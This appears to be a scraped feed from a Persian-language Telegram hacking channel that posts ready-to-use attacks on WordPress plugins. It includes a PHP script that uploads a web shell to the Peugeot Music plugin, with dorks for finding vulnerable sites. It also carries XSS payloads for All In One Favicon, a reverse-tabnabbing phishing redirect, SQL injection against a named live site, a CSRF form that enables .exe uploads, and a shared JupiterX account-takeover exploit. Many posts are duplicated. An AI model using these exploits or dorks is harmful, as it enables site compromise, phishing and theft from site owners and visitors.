#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
👍1
This media is not supported in your browser
VIEW IN TELEGRAM
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
POC اسیب پذیریه XSS در پلاگین (All In One Favicon ) : #XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon 0Day.Today Boy's @LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
⚡1
#Wordpress #Plugin #Wisechat <= V 2.6.3 - #Reverse #Tabnabbing - #Vulnerable #Vuln (Vulnerable)
➖➖➖➖➖➖➖➖➖➖
آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :
✅ Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
➖➖
✅ Exploit :
🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1
2 - Pic_2
➖➖
✅ Demo WiseChat :
دمو پلاگین
➖➖
✅ About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...
➖➖➖➖➖➖➖➖➖➖
⛓ ++ > @LearnExploit <++
➖➖➖➖➖➖➖➖➖➖
آسیب پذیری - برگه ی معکوس یا صفحه ی دزدی معکوس ( Reverse Tabnabbing ) در پلاگین WiseChat وردپرس :
✅ Exploit Title :
Wordpress Plugin Wisechat <= 2.6.3 - Reverse Tabnabbing
➖➖
✅ Exploit :
<html>
<script>
if (window.opener) window.opener.parent.location.replace(' #Pishing Page');
if (window.parent != window) window.parent.location.replace('#Pishing Page');
</script>
Open Redirect TEST
</html>
➖➖🔰 Description :
#توضیحات :
وقتی کاربر روی لینک مخرب کلیک میکنید محتویات لینک مخرب در تب جدید اما درخوده URL سایت به ما نمایش داده میشود
برای فهمیدن روی عکس ها کلیک کنید :
1 - Pic_1
2 - Pic_2
➖➖
✅ Demo WiseChat :
دمو پلاگین
➖➖
✅ About Reverse Tabnabbing :
اطلاعات بیشتر در مورد آسیب پذیری برگه ی معکوس در پست بعدی.
با تشکر از همراهی شما دوستان...
➖➖➖➖➖➖➖➖➖➖
⛓ ++ > @LearnExploit <++
#Dork - #SQLi (Structure Query Language Injection)
#WordPress - #Plugin - #PT_Content_Views_Pro v 2.1.2
➖➖➖➖➖➖➖
🔰 #~Exploit Title :
➖➖➖➖
🔰 #~Dork :
➖➖➖➖
🔰 #~Inpact :
➖➖➖➖
🔰 #~Example :
➖➖➖➖
🔰 #~db_Error:
➖➖➖➖➖➖➖
🌐 Software Download Link
🌐 Software Information Link
با تشکر از دوستان
➖➖➖➖➖➖➖
[+] T.me/LearnExploit
[-] 0Day.Today Boy's
#WordPress - #Plugin - #PT_Content_Views_Pro v 2.1.2
➖➖➖➖➖➖➖
🔰 #~Exploit Title :
WordPress PT-Content-Views-Pro Plugins 2.1.2 SQL Injection
➖➖➖➖
🔰 #~Dork :
inurl:''/wp-content/plugins/pt-content-views-pro/''
➖➖➖➖
🔰 #~Inpact :
/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=[SQL Injection]
➖➖➖➖
🔰 #~Example :
happyhormonecottage.com/wp-content/plugins/pt-content-views-pro/admin/content-views-admin.php?id=1%27
➖➖➖➖
🔰 #~db_Error:
Fatal error: Class 'PT_Content_Views_Admin' not found in /home/hhcnewserver/public_html/wp-content/plugins/pt-content-views-pro /admin/content-views-admin.php on line 12
➖➖➖➖➖➖➖
🌐 Software Download Link
🌐 Software Information Link
با تشکر از دوستان
➖➖➖➖➖➖➖
[+] T.me/LearnExploit
[-] 0Day.Today Boy's
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
This media is not supported in your browser
VIEW IN TELEGRAM
POC
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
0Day.Today Boy's
@LearnExploit
Forwarded from 0Day.Today | Learn Exploit | Zero World | Dark web |
اسیب پذیریه XSS در پلاگین (All In One Favicon ) :
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#XSS #Multiple #Vul in #wp #plugin #all_In_One_Favicon
—————-
این اسیب پذیری در نسخه های پاین تر از 4.6 به هکر اجازه ی اجرا کردن کد های جاوا اسکریپت رو میده
url : http://localhost/wordpress/wp-admin/options-general.php?page=all-in-one-favicon%2Fall-in-one-favicon.php
==
پارامتر هایی که این اسیب پذیریو دارند :
backendApple-Text
backendICO-Text
backendPNG-Text
backendGIF-Text
frontendApple-Text
frontendICO-Text
frontendPNG-Text
frontendGIF-Text
==
پیلود هایی که برای این اسیب پذیری استفاده میشه :
"><img src=a onerror=alert(1)>
"><img src=a onerror=alert(String.fromCharCode(88,83,83))>
==
Exploit link :
https://www.exploit-db.com/exploits/45056/
—————————
0Day.Today Boy's
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
----
@LearnExploit
#CSRF #vulnerabilities in #WP #Add_Mime_Types #Plugin <= 2.2.1
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
-----
آسیب پذیری CSRF در پلاگین Add Mime Types ورژن 2.2.1 به پایین.
➖➖➖➖➖➖➖➖➖
#Description :
این افزونه به شما این اجازه رو میده که فایل هایی با فرمت مختلف روی سایت وردپرسی خودتان اپلود کنید.
➖➖➖➖➖➖➖➖
⚫️امکانات ویژه افزونه WP Add Mime Types:
🔴رابط کاربری بسیار آسان
🔴قابلیت افزودن فرمتهای مختلف
🔴دارای تقریباً ۹۰ نوع فرمت مختلف
🔴قابلیت تعریف فرمتهای دیگر
🔴بهروزرسانیهای مرتب
و...
➖➖➖➖➖➖➖
#Google Dork: inurl:”/wp-content/plugins/wp-add-mime-types”
➖➖➖➖➖➖➖
#Exploit :
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://IP/wp-admin/options-general.php?page=wp-add-mime-types%2Fincludes%2Fadmin.php">
<input type="hidden" name="mime_type_values" value="exe = application/x-msdownload">
<input type="submit">
</form>
</body>
</html>
➖➖➖➖➖➖➖➖➖➖
@LearnExploit 🤟🏻
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
Shared By XP4➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡5👍2❤🔥1👏1😁1
CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡6👍5❤1
SSRF King - SSRF plugin for burp Automates SSRF
Github
#plugin #Burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#plugin #Burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6❤🔥3👍2